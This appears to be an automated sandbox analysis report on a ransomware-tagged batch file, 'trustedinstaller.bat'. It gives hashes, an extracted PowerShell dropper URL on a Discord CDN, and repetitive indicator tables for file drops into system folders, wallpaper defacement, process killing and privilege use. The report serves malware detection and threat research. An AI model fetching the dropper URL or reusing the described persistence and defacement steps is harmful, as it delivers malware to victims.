9802eda5439017e0b2fe42d53bbeac75176c52b4383e33d1a4cb445a00b16b8b

Analysis

max time kernel
26s
max time network
134s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
23/07/2024, 19:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

trustedinstaller.bat
Size

3KB
MD5

a342c02d8b85d351af8871776fc67dd7
SHA1

4b7c7e5697cee05354f0902a3c40d35c7c892a7d
SHA256

9802eda5439017e0b2fe42d53bbeac75176c52b4383e33d1a4cb445a00b16b8b
SHA512

7ae1f71e87dc52c2dd640c025ca623304e28717119c52107163d905e8f17d6a20de243e6a1cf8f75ab9e797224b47eae199a669e209998620625b20c099657d5

Score

10^/10

execution ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&

Signatures

Blocklisted process makes network request 24 IoCs

flow	pid	Process
3	2348	powershell.exe
4	2348	powershell.exe
5	1616	powershell.exe
6	1616	powershell.exe
7	824	powershell.exe
8	824	powershell.exe
9	2160	powershell.exe
10	2160	powershell.exe
11	624	powershell.exe
12	624	powershell.exe
15	684	powershell.exe
16	684	powershell.exe
17	2304	powershell.exe
18	2304	powershell.exe
19	1660	powershell.exe
20	1660	powershell.exe
21	3332	powershell.exe
22	3332	powershell.exe
23	3680	powershell.exe
24	3680	powershell.exe
25	2720	powershell.exe
26	2720	powershell.exe
27	1364	powershell.exe
28	1364	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
404	powershell.exe
5096	Process not Found
16896	Process not Found
624	powershell.exe
2000	powershell.exe
12220	Process not Found
4672	powershell.exe
2104	powershell.exe
3868	powershell.exe
11508	Process not Found
5892	Process not Found
2628	powershell.exe
1296	powershell.exe
4256	powershell.exe
7172	powershell.exe
12872	Process not Found
2948	powershell.exe
11104	Process not Found
12372	Process not Found
6428	powershell.exe
13724	Process not Found
5552	powershell.exe
4208	powershell.exe
12340	Process not Found
12452	Process not Found
1448	powershell.exe
7044	powershell.exe
12420	Process not Found
12332	Process not Found
13432	Process not Found
10936	Process not Found
1596	powershell.exe
5340	powershell.exe
12284	Process not Found
11124	Process not Found
12144	Process not Found
3068	powershell.exe
2232	powershell.exe
7972	powershell.exe
2688	powershell.exe
2304	powershell.exe
3680	Process not Found
12096	Process not Found
2720	powershell.exe
6188	powershell.exe
8072	powershell.exe
2228	powershell.exe
7156	powershell.exe
14180	Process not Found
11184	Process not Found
11988	Process not Found
8688	Process not Found
684	powershell.exe
2372	powershell.exe
4112	Process not Found
4068	powershell.exe
8008	powershell.exe
824	powershell.exe
4684	powershell.exe
3300	powershell.exe
5880	powershell.exe
7820	powershell.exe
3108	powershell.exe
4112	powershell.exe

Drops file in System32 directory 23 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File created	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\System32\trustedinstaller.bat	cmd.exe

Sets desktop wallpaper using registry 2 TTPs 64 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.png"	reg.exe

Drops file in Program Files directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File created	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File created	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File created	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Program Files\BatchFile\trustedinstaller.bat	cmd.exe

Drops file in Windows directory 23 IoCs

description	ioc	Process
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File created	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe
File opened for modification	C:\Windows\trustedinstaller.bat	cmd.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
4072	taskkill.exe
5384	taskkill.exe
5056	taskkill.exe
4128	taskkill.exe
11044	Process not Found
3440	taskkill.exe
4460	taskkill.exe
2572	taskkill.exe
5884	taskkill.exe
4944	taskkill.exe
3932	taskkill.exe
2256	taskkill.exe
4172	taskkill.exe
2732	taskkill.exe
5900	taskkill.exe
2084	taskkill.exe
3248	taskkill.exe
4512	taskkill.exe
9864	taskkill.exe
4476	Process not Found
5936	taskkill.exe
5168	taskkill.exe
5228	taskkill.exe
5392	taskkill.exe
16708	Process not Found
10988	Process not Found
5320	Process not Found
3288	taskkill.exe
2056	taskkill.exe
5232	Process not Found
12060	Process not Found
11052	Process not Found
15460	Process not Found
16424	Process not Found
4016	taskkill.exe
1852	taskkill.exe
4600	taskkill.exe
6820	taskkill.exe
8228	taskkill.exe
16240	Process not Found
17224	Process not Found
1092	taskkill.exe
5632	taskkill.exe
2864	taskkill.exe
3944	taskkill.exe
1036	taskkill.exe
5632	taskkill.exe
3624	taskkill.exe
11852	Process not Found
6224	Process not Found
2872	taskkill.exe
3760	taskkill.exe
5760	taskkill.exe
5264	taskkill.exe
9808	taskkill.exe
14736	Process not Found
11740	Process not Found
2944	taskkill.exe
3912	taskkill.exe
5240	taskkill.exe
4780	taskkill.exe
8632	taskkill.exe
6984	Process not Found
14428	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2348	powershell.exe
2652	powershell.exe
1616	powershell.exe
2628	powershell.exe
2296	powershell.exe
3068	powershell.exe
2676	powershell.exe
792	powershell.exe
824	powershell.exe
2932	powershell.exe
2176	powershell.exe
1180	powershell.exe
2476	powershell.exe
1784	powershell.exe
1572	powershell.exe
1584	powershell.exe
2224	powershell.exe
932	powershell.exe
3020	powershell.exe
2428	powershell.exe
2624	powershell.exe
2020	powershell.exe
308	powershell.exe
2024	powershell.exe
2628	powershell.exe
1016	powershell.exe
2372	powershell.exe
1856	powershell.exe
2572	powershell.exe
2496	powershell.exe
2160	powershell.exe
344	powershell.exe
1296	powershell.exe
2876	powershell.exe
2616	powershell.exe
524	powershell.exe
2924	powershell.exe
624	powershell.exe
404	powershell.exe
2292	powershell.exe
2688	powershell.exe
1756	powershell.exe
1772	powershell.exe
2464	powershell.exe
2968	powershell.exe
2880	powershell.exe
2824	powershell.exe
1364	powershell.exe
1368	powershell.exe
684	powershell.exe
3016	powershell.exe
548	powershell.exe
3976	powershell.exe
2304	powershell.exe
2668	powershell.exe
2292	powershell.exe
3696	powershell.exe
3652	powershell.exe
1856	powershell.exe
3840	powershell.exe
1016	powershell.exe
3720	powershell.exe
3368	powershell.exe
1944	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2608	taskkill.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	1092	taskkill.exe
Token: SeDebugPrivilege	792	powershell.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	2212	taskkill.exe
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	932	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	308	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	2432	taskkill.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	2872	taskkill.exe
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	344	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	624	powershell.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	3924	taskkill.exe
Token: SeDebugPrivilege	4052	taskkill.exe
Token: SeDebugPrivilege	3068	taskkill.exe
Token: SeDebugPrivilege	1036	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	3588	taskkill.exe
Token: SeDebugPrivilege	2540	taskkill.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2812 wrote to memory of 2348	2812	cmd.exe	31
PID 2812 wrote to memory of 2348	2812	cmd.exe	31
PID 2812 wrote to memory of 2348	2812	cmd.exe	31
PID 2812 wrote to memory of 2816	2812	cmd.exe	87
PID 2812 wrote to memory of 2816	2812	cmd.exe	87
PID 2812 wrote to memory of 2816	2812	cmd.exe	87
PID 2812 wrote to memory of 2212	2812	cmd.exe	88
PID 2812 wrote to memory of 2212	2812	cmd.exe	88
PID 2812 wrote to memory of 2212	2812	cmd.exe	88
PID 2812 wrote to memory of 2168	2812	cmd.exe	34
PID 2812 wrote to memory of 2168	2812	cmd.exe	34
PID 2812 wrote to memory of 2168	2812	cmd.exe	34
PID 2812 wrote to memory of 2836	2812	cmd.exe	35
PID 2812 wrote to memory of 2836	2812	cmd.exe	35
PID 2812 wrote to memory of 2836	2812	cmd.exe	35
PID 2812 wrote to memory of 2776	2812	cmd.exe	36
PID 2812 wrote to memory of 2776	2812	cmd.exe	36
PID 2812 wrote to memory of 2776	2812	cmd.exe	36
PID 2812 wrote to memory of 2780	2812	cmd.exe	37
PID 2812 wrote to memory of 2780	2812	cmd.exe	37
PID 2812 wrote to memory of 2780	2812	cmd.exe	37
PID 2812 wrote to memory of 2724	2812	cmd.exe	38
PID 2812 wrote to memory of 2724	2812	cmd.exe	38
PID 2812 wrote to memory of 2724	2812	cmd.exe	38
PID 2812 wrote to memory of 2820	2812	cmd.exe	39
PID 2812 wrote to memory of 2820	2812	cmd.exe	39
PID 2812 wrote to memory of 2820	2812	cmd.exe	39
PID 2812 wrote to memory of 2608	2812	cmd.exe	40
PID 2812 wrote to memory of 2608	2812	cmd.exe	40
PID 2812 wrote to memory of 2608	2812	cmd.exe	40
PID 2836 wrote to memory of 2628	2836	cmd.exe	107
PID 2836 wrote to memory of 2628	2836	cmd.exe	107
PID 2836 wrote to memory of 2628	2836	cmd.exe	107
PID 2168 wrote to memory of 2652	2168	cmd.exe	42
PID 2168 wrote to memory of 2652	2168	cmd.exe	42
PID 2168 wrote to memory of 2652	2168	cmd.exe	42
PID 2776 wrote to memory of 2676	2776	cmd.exe	43
PID 2776 wrote to memory of 2676	2776	cmd.exe	43
PID 2776 wrote to memory of 2676	2776	cmd.exe	43
